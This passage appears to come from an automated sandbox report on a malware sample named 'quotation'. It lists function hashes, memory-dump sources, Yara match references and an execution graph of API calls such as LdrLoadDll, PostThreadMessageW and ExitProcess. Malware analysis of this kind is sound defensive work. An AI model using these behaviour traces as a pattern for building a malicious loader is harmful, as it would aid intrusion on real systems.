                                                                                  • Opcode ID: 2dd5263c722a15990b72fbcbddb0a79c0411f644639f72dcc0c544beca1a8590
                                                                                  • Instruction ID: 3166233637192f36257d3dc3f300fb2cdb7a27571b07e91c58709344e8620b3d
                                                                                  • Opcode Fuzzy Hash: 2dd5263c722a15990b72fbcbddb0a79c0411f644639f72dcc0c544beca1a8590
                                                                                  • Instruction Fuzzy Hash: 551102B6C00249CFDB24CF9AC944B9EFBF4EB88214F10845AD528B7210C379A545CFA1
                                                                                  Function 0118D3D8 Relevance: .1, Instructions: 75COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2082194478.000000000118D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0118D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_118d000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3867a022c7012efaf317974fdb14cf59663850b4fbf9a0de60b591cc965ee4ed
                                                                                  • Instruction ID: d5634ef3bd38b321ffe28990713bd36675b5e8a813e80d2e439e6181ce5f4191
                                                                                  • Opcode Fuzzy Hash: 3867a022c7012efaf317974fdb14cf59663850b4fbf9a0de60b591cc965ee4ed
                                                                                  • Instruction Fuzzy Hash: 692136B1104304DFDF09EF88E9C0B56BF65FB88324F20C568D9090B696C336E406CAA2
                                                                                  Function 011AD01C Relevance: .1, Instructions: 72COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2082260632.00000000011AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011AD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_11ad000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 06d7387ddd3d8f04d01a50954f2ba7ed8c0df85f1e4a5ca3e76ccaa43e055b43
                                                                                  • Instruction ID: be6749ed6dab3703176b122403bd4d89015a9f13af38108859462bb734bb6381
                                                                                  • Opcode Fuzzy Hash: 06d7387ddd3d8f04d01a50954f2ba7ed8c0df85f1e4a5ca3e76ccaa43e055b43
                                                                                  • Instruction Fuzzy Hash: 26212579544600DFCF19DF58EA80B26BF65EB88314F60C56DD8094B646C33AD407CA62
                                                                                  Function 011AD006 Relevance: .1, Instructions: 63COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2082260632.00000000011AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011AD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_11ad000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8663f756557f0d93cbfc78ad90ebe32e2d5a9f4bf1db69b49e0fba2a1db60767
                                                                                  • Instruction ID: 9eb554f1514dcaafc98665436e7c25396fd90a5e31896a270e3064d3593a3091
                                                                                  • Opcode Fuzzy Hash: 8663f756557f0d93cbfc78ad90ebe32e2d5a9f4bf1db69b49e0fba2a1db60767
                                                                                  • Instruction Fuzzy Hash: 0C21B0754487809FCB07CF24DA94711BF71EF46214F28C5DAD8498F6A7C33A980ACB62
                                                                                  Function 0118D3D3 Relevance: .1, Instructions: 56COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2082194478.000000000118D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0118D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_118d000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
                                                                                  • Instruction ID: de175e1684b1168500d6f5406b87c629a7a836fd2050742cca938329cd296483
                                                                                  • Opcode Fuzzy Hash: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
                                                                                  • Instruction Fuzzy Hash: 8C11CD76404240DFDF06DF48D5C4B56BF61FB84324F24C2A9D9090A656C33AE45ACBA2
                                                                                  Function 0118D731 Relevance: .0, Instructions: 45COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2082194478.000000000118D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0118D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_118d000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 15decc58422212c1e55c4315e1ff742f2a081ce4dd9f0d647cd66f9337dfa91b
                                                                                  • Instruction ID: 442d764da4d300d81b8646c6bdc2290fe6331c6524327efdf223412954e98228
                                                                                  • Opcode Fuzzy Hash: 15decc58422212c1e55c4315e1ff742f2a081ce4dd9f0d647cd66f9337dfa91b
                                                                                  • Instruction Fuzzy Hash: E901A7710057849AEB19BAA9EDC4766BF98DF41338F18C459ED094A1C3D7799840CEB2
                                                                                  Function 0118D730 Relevance: .0, Instructions: 36COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2082194478.000000000118D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0118D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_118d000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 53e4db262fc9560f1c053099969e68ab3290c3a3d456634083bc617ec6d2fa69
                                                                                  • Instruction ID: 1ed1432fee36ffefd6e39b33dd445b8560d5efca074b94497e9e0262244bb950
                                                                                  • Opcode Fuzzy Hash: 53e4db262fc9560f1c053099969e68ab3290c3a3d456634083bc617ec6d2fa69
                                                                                  • Instruction Fuzzy Hash: 86F0C272004784AEEB159A19D984B62FF98EB91738F18C45AED080F287C3799840CAB1

                                                                                  Non-executed Functions

                                                                                  Function 02BC3548 Relevance: 2.7, Strings: 2, Instructions: 182COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2082479816.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_2bc0000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: .@$fk
                                                                                  • API String ID: 0-2595805726
                                                                                  • Opcode ID: 9fdf98732023515d79889f4d79301880f992a7b33b8251ac4a9e20dd621a83bf
                                                                                  • Instruction ID: ffd4b25dbd39ecb19626a6bd01e75d0342cb40364f1de8aeabfff9989f608c1b
                                                                                  • Opcode Fuzzy Hash: 9fdf98732023515d79889f4d79301880f992a7b33b8251ac4a9e20dd621a83bf
                                                                                  • Instruction Fuzzy Hash: 7C510671B181068FCB04DB6CC9465AEBBF1AB89200FA5C5FBE805EB355D234DE11CB95
                                                                                  Function 02BC2BD0 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2082479816.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_2bc0000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: I1T}
                                                                                  • API String ID: 0-311612125
                                                                                  • Opcode ID: 745b61daaf1037d6a519e9ddc0f6c23b086c061bc5565fd967425d5c3bacdbd5
                                                                                  • Instruction ID: fa558eaaba5b6854e9a243a1b868c6e73b6872da68013b2ef0fd56c9043910cb
                                                                                  • Opcode Fuzzy Hash: 745b61daaf1037d6a519e9ddc0f6c23b086c061bc5565fd967425d5c3bacdbd5
                                                                                  • Instruction Fuzzy Hash: BE41C035714605CFC764CF39C885A6AB7F2FB85220F64D8AEE41ADB624C230E941CF41
                                                                                  Function 02BC1628 Relevance: .2, Instructions: 169COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2082479816.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_2bc0000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6ad1805faa28e97939d27e80b6c4cf0cdfd7faf1a8eba17d915e4379b6f88d18
                                                                                  • Instruction ID: 8c013ed5da0f1cef6aa85bd8007a9f002841a8a1454d022d58bead6c2ef3046d
                                                                                  • Opcode Fuzzy Hash: 6ad1805faa28e97939d27e80b6c4cf0cdfd7faf1a8eba17d915e4379b6f88d18
                                                                                  • Instruction Fuzzy Hash: B3518772B242008FC314DE6CD49059ABBA6FB85310B6884BFD44AFB752D734ED15C790
                                                                                  Function 02BC2BC2 Relevance: .1, Instructions: 115COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2082479816.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_2bc0000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9d3504f6c82461d220ad53f781da47686b957500aab491c9140aaba3c1aaecaf
                                                                                  • Instruction ID: a46f54f323b8b24d71f93be852cb2d95311ff8d3f75b36a197e4c74fcebcb285
                                                                                  • Opcode Fuzzy Hash: 9d3504f6c82461d220ad53f781da47686b957500aab491c9140aaba3c1aaecaf
                                                                                  • Instruction Fuzzy Hash: FA41AE35B14606CFC764CF69C885A6AB7F6FF84220F64C8AEE45ADB624D234E941CB41
                                                                                  Function 02BC3642 Relevance: .1, Instructions: 102COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2082479816.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_2bc0000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5fdbd135a9b59bfc7e18ddec09d39baa0f6782053d6006fdd9c8e0a7c55b895b
                                                                                  • Instruction ID: 91ad790ea93513f525848c219a899b7d1e97696d5a2370a249b7c50aaa04543a
                                                                                  • Opcode Fuzzy Hash: 5fdbd135a9b59bfc7e18ddec09d39baa0f6782053d6006fdd9c8e0a7c55b895b
                                                                                  • Instruction Fuzzy Hash: A331A675F181068FCB44DB59C94656EB7F1FB89210BE5C5BAA806EB355D230CD01CB91
                                                                                  Function 02BC0A4D Relevance: .1, Instructions: 70COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2082479816.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_2bc0000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8a173a569edf0e4378619c07f8276011fb153105183b74a7d03f2fd7a7e7f9cf
                                                                                  • Instruction ID: e06ba49a55685e1623e5a886575ca29779f6e8c837580a434ae4b52e6dc98355
                                                                                  • Opcode Fuzzy Hash: 8a173a569edf0e4378619c07f8276011fb153105183b74a7d03f2fd7a7e7f9cf
                                                                                  • Instruction Fuzzy Hash: EB319EB0E6934ACFCB54DF68C580499BBA5FB4A210B64DADAC8659F146D330D482CF91
                                                                                  Function 02BC0958 Relevance: .1, Instructions: 57COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2082479816.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_2bc0000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b89efe5ada56fd16f144d3b700ae9c8f6029ca054403c3c0d7d7937c5b556741
                                                                                  • Instruction ID: 97bebfec72539ec0247a5b9f875c88968a6e040faee9d0be55f45922277b7e49
                                                                                  • Opcode Fuzzy Hash: b89efe5ada56fd16f144d3b700ae9c8f6029ca054403c3c0d7d7937c5b556741
                                                                                  • Instruction Fuzzy Hash: 39215CB0D65206CFCB94DF64C18085AFBB5FF59200B65DAEAC8299F506C330E491CFA1
                                                                                  Function 02BC08B0 Relevance: .1, Instructions: 54COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2082479816.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_2bc0000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c89c6cdaab8513814588eee365d2dc28e7c34eb839347ed3d850cd15e93aaea4
                                                                                  • Instruction ID: 4c5e50a788e488b1ef3ffd8d194ecd33e1bfb6597edb70a267596c4693d27e9e
                                                                                  • Opcode Fuzzy Hash: c89c6cdaab8513814588eee365d2dc28e7c34eb839347ed3d850cd15e93aaea4
                                                                                  • Instruction Fuzzy Hash: F62127B0E6420ACFCB54DF68C584499B7B5FF49210B21DA9AD825AF506D330E891CF95

                                                                                  Execution Graph

                                                                                  Execution Coverage:1.2%
                                                                                  Dynamic/Decrypted Code Coverage:4.8%
                                                                                  Signature Coverage:7.6%
                                                                                  Total number of Nodes:145
                                                                                  Total number of Limit Nodes:15
                                                                                  execution_graph 93966 424d63 93967 424d7f 93966->93967 93968 424da7 93967->93968 93969 424dbb 93967->93969 93970 42cab3 NtClose 93968->93970 93976 42cab3 93969->93976 93972 424db0 93970->93972 93973 424dc4 93979 42ec93 RtlAllocateHeap 93973->93979 93975 424dcf 93977 42cacd 93976->93977 93978 42cade NtClose 93977->93978 93978->93973 93979->93975 94119 42c073 94120 42c090 94119->94120 94123 12f2df0 LdrInitializeThunk 94120->94123 94121 42c0b8 94123->94121 94124 42fc13 94125 42fc23 94124->94125 94126 42fc29 94124->94126 94127 42ec53 RtlAllocateHeap 94126->94127 94128 42fc4f 94127->94128 94129 4250f3 94133 42510c 94129->94133 94130 425154 94131 42eb73 RtlFreeHeap 94130->94131 94132 425164 94131->94132 94133->94130 94134 425197 94133->94134 94136 42519c 94133->94136 94135 42eb73 RtlFreeHeap 94134->94135 94135->94136 93980 41e903 93981 41e929 93980->93981 93987 41ea25 93981->93987 93989 42fd43 93981->93989 93983 41e9ba 93984 41ea1c 93983->93984 93983->93987 94000 42c0c3 93983->94000 93984->93987 93995 428cf3 93984->93995 93988 41ead1 93990 42fcb3 93989->93990 93991 42fd10 93990->93991 94004 42ec53 93990->94004 93991->93983 93993 42fced 94007 42eb73 93993->94007 93996 428d58 93995->93996 93997 428d93 93996->93997 94016 418fd3 93996->94016 93997->93988 93999 428d75 93999->93988 94001 42c0e0 94000->94001 94024 12f2c0a 94001->94024 94002 42c10c 94002->93984 94010 42cde3 94004->94010 94006 42ec6e 94006->93993 94013 42ce33 94007->94013 94009 42eb8c 94009->93991 94011 42ce00 94010->94011 94012 42ce11 RtlAllocateHeap 94011->94012 94012->94006 94014 42ce50 94013->94014 94015 42ce61 RtlFreeHeap 94014->94015 94015->94009 94017 418f8e 94016->94017 94020 418fef 94016->94020 94021 42ce83 94017->94021 94019 418fbb 94019->93999 94022 42cea0 94021->94022 94023 42ceb1 ExitProcess 94022->94023 94023->94019 94025 12f2c1f LdrInitializeThunk 94024->94025 94026 12f2c11 94024->94026 94025->94002 94026->94002 94027 419283 94029 4192b3 94027->94029 94030 4192df 94029->94030 94031 41b733 94029->94031 94032 41b777 94031->94032 94033 42cab3 NtClose 94032->94033 94034 41b798 94032->94034 94033->94034 94034->94029 94035 4144a3 94036 4144bc 94035->94036 94041 417c23 94036->94041 94038 4144da 94039 414513 PostThreadMessageW 94038->94039 94040 414526 94038->94040 94039->94040 94042 417c47 94041->94042 94043 417c4e 94042->94043 94044 417c83 LdrLoadDll 94042->94044 94043->94038 94044->94043 94137 413f33 94138 413f55 94137->94138 94140 42cd43 94137->94140 94141 42cd5d 94140->94141 94144 12f2c70 LdrInitializeThunk 94141->94144 94142 42cd85 94142->94138 94144->94142 94045 401aee 94046 401b37 94045->94046 94049 4300e3 94046->94049 94052 42e723 94049->94052 94053 42e749 94052->94053 94064 407543 94053->94064 94055 42e75f 94056 401c7a 94055->94056 94067 41b543 94055->94067 94058 42e77e 94059 42e793 94058->94059 94060 42ce83 ExitProcess 94058->94060 94078 428603 94059->94078 94060->94059 94062 42e7ad 94063 42ce83 ExitProcess 94062->94063 94063->94056 94082 4168e3 94064->94082 94066 407550 94066->94055 94068 41b56f 94067->94068 94093 41b433 94068->94093 94071 41b59c 94074 42cab3 NtClose 94071->94074 94075 41b5a7 94071->94075 94072 41b5d0 94072->94058 94073 41b5b4 94073->94072 94076 42cab3 NtClose 94073->94076 94074->94075 94075->94058 94077 41b5c6 94076->94077 94077->94058 94079 428665 94078->94079 94081 428672 94079->94081 94104 418a93 94079->94104 94081->94062 94083 416900 94082->94083 94085 416919 94083->94085 94086 42d533 94083->94086 94085->94066 94087 42d54d 94086->94087 94088 42d57c 94087->94088 94089 42c0c3 LdrInitializeThunk 94087->94089 94088->94085 94090 42d5d9 94089->94090 94091 42eb73 RtlFreeHeap 94090->94091 94092 42d5f2 94091->94092 94092->94085 94094 41b44d 94093->94094 94098 41b529 94093->94098 94099 42c163 94094->94099 94097 42cab3 NtClose 94097->94098 94098->94071 94098->94073 94100 42c180 94099->94100 94103 12f35c0 LdrInitializeThunk 94100->94103 94101 41b51d 94101->94097 94103->94101 94106 418abd 94104->94106 94105 418fbb 94105->94081 94106->94105 94112 414113 94106->94112 94108 418be4 94108->94105 94109 42eb73 RtlFreeHeap 94108->94109 94110 418bfc 94109->94110 94110->94105 94111 42ce83 ExitProcess 94110->94111 94111->94105 94116 414133 94112->94116 94114 414192 94114->94108 94115 41419c 94115->94108 94116->94115 94117 41b853 RtlFreeHeap LdrInitializeThunk 94116->94117 94117->94114 94118 12f2b60 LdrInitializeThunk

                                                                                  Executed Functions

                                                                                  Function 00417C23 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 78 417c23-417c3f 79 417c47-417c4c 78->79 80 417c42 call 42f753 78->80 81 417c52-417c60 call 42fd53 79->81 82 417c4e-417c51 79->82 80->79 85 417c70-417c81 call 42e1f3 81->85 86 417c62-417c6d call 42fff3 81->86 91 417c83-417c97 LdrLoadDll 85->91 92 417c9a-417c9d 85->92 86->85 91->92
                                                                                  APIs
                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417C95
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381205965.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_quotation.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Load
                                                                                  • String ID:
                                                                                  • API String ID: 2234796835-0
                                                                                  • Opcode ID: 54d6f386663d5f6ad0a9369f0d80f04f2da9edb397004349e0dbd63b4fb0560c
                                                                                  • Instruction ID: 852cf962e2409d618e8b38b88b5540d93302ef35c3232a8832e2f214825db3c9
                                                                                  • Opcode Fuzzy Hash: 54d6f386663d5f6ad0a9369f0d80f04f2da9edb397004349e0dbd63b4fb0560c
                                                                                  • Instruction Fuzzy Hash: 090125B5E0020DA7DF10DBE5DC42FDEB378AB54308F4081A6E90897241F675EB58C795
                                                                                  Function 0042CAB3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 98 42cab3-42caec call 404883 call 42dd13 NtClose
                                                                                  APIs
                                                                                  • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CAE7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381205965.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_quotation.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Close
                                                                                  • String ID:
                                                                                  • API String ID: 3535843008-0
                                                                                  • Opcode ID: 0972272d2523aad39672e0d6cd6478e3c5c68d2fec25f3726e41a2152dbfdc4c
                                                                                  • Instruction ID: 1f7ce933016469cc88b19e90322ff2e304760343167cfa218f45b51e943dd486
                                                                                  • Opcode Fuzzy Hash: 0972272d2523aad39672e0d6cd6478e3c5c68d2fec25f3726e41a2152dbfdc4c
                                                                                  • Instruction Fuzzy Hash: A8E02C362102007BC620FAAADC01FAB736CEFC5B24F00402EFA08A7242C374B90083F0
                                                                                  Function 012F2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 116 12f2b60-12f2b6c LdrInitializeThunk
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 67f089f381d2b68f297e419898672a99ff41765302aefcebdf41bb770df0dd58
                                                                                  • Instruction ID: 21eaba16019cff5b1fc465f4880cee5be9f4b1c2bf9c72ae6f07df50fab1ac01
                                                                                  • Opcode Fuzzy Hash: 67f089f381d2b68f297e419898672a99ff41765302aefcebdf41bb770df0dd58
                                                                                  • Instruction Fuzzy Hash: F3900265602800439106715C4424616404A97E0205B55C061E10145D4DC52589D56225
                                                                                  Function 012F2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 118 12f2df0-12f2dfc LdrInitializeThunk
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: a91585e6a1f0804c03d08f8ffff24dfdbbd13b8de132fb1b897083c87627120b
                                                                                  • Instruction ID: 543d39d6c4b26dcabb12ec46188cd589602545ceb2346d9be9925296b35d6cf5
                                                                                  • Opcode Fuzzy Hash: a91585e6a1f0804c03d08f8ffff24dfdbbd13b8de132fb1b897083c87627120b
                                                                                  • Instruction Fuzzy Hash: D490023560180453E112715C4514707004997D0245F95C452A042459CDD6568A96A221
                                                                                  Function 012F2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 117 12f2c70-12f2c7c LdrInitializeThunk
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: f21eb8747f86addaf77516cc1361ed34f87efc47c5133ac74778e528c9b80d07
                                                                                  • Instruction ID: 2145964fb828989c347cf961c0427fb3012962f47332a55482ed6428fa2947ca
                                                                                  • Opcode Fuzzy Hash: f21eb8747f86addaf77516cc1361ed34f87efc47c5133ac74778e528c9b80d07
                                                                                  • Instruction Fuzzy Hash: 1990023560188842E111715C841474A004597D0305F59C451A442469CDC69589D57221
                                                                                  Function 012F35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 2fa55755776bdb72428a12694452f2b158e66ce8270dbb6a2a1594d3158ea298
                                                                                  • Instruction ID: 78c7b917c4afae5266896b7dc76a71ae7202aaf5d565bea2ae95e1a4f8c01d71
                                                                                  • Opcode Fuzzy Hash: 2fa55755776bdb72428a12694452f2b158e66ce8270dbb6a2a1594d3158ea298
                                                                                  • Instruction Fuzzy Hash: E8900235A0590442E101715C4524706104597D0205F65C451A04245ACDC7958A9566A2
                                                                                  Function 0041449B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59threadwindowCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • PostThreadMessageW.USER32(sE716IK71M,00000111,00000000,00000000), ref: 00414520
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381205965.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_quotation.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessagePostThread
                                                                                  • String ID: sE716IK71M$sE716IK71M
                                                                                  • API String ID: 1836367815-922563818
                                                                                  • Opcode ID: b45cae07c9c219c099e0826546d53defafec1ad3bdbe238061a0a9cc026b5f1f
                                                                                  • Instruction ID: 2c93fbf58faf19b7145b43889d661f3b69fec038b2ff8a571458cfb118ad8616
                                                                                  • Opcode Fuzzy Hash: b45cae07c9c219c099e0826546d53defafec1ad3bdbe238061a0a9cc026b5f1f
                                                                                  • Instruction Fuzzy Hash: 4A110431E4021876EF219AA1AC42FEF7F789F81754F448059FA04BB281DAB856068BE5
                                                                                  Function 004144A3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 14 4144a3-4144b3 15 4144bc-414511 call 42f623 call 417c23 call 4047f3 call 425223 14->15 16 4144b7 call 42ec13 14->16 25 414533-414538 15->25 26 414513-414524 PostThreadMessageW 15->26 16->15 26->25 27 414526-414530 26->27 27->25
                                                                                  APIs
                                                                                  • PostThreadMessageW.USER32(sE716IK71M,00000111,00000000,00000000), ref: 00414520
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381205965.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_quotation.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessagePostThread
                                                                                  • String ID: sE716IK71M$sE716IK71M
                                                                                  • API String ID: 1836367815-922563818
                                                                                  • Opcode ID: 3de012e5431b6b67fac50700b1926275c7c37100b9222c36437f17da7e8deb27
                                                                                  • Instruction ID: 8504cfec16b6aedebdd5f95c05872cee6fb7df1a624910d20b6db10e5d894ebc
                                                                                  • Opcode Fuzzy Hash: 3de012e5431b6b67fac50700b1926275c7c37100b9222c36437f17da7e8deb27
                                                                                  • Instruction Fuzzy Hash: 4C01D671E4021876EB2196A1AD02FDF7B7C9F41B54F444059FB047B2C1EBB86A068BE5
                                                                                  Function 0042CE33 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                                                  Download Yara Rule

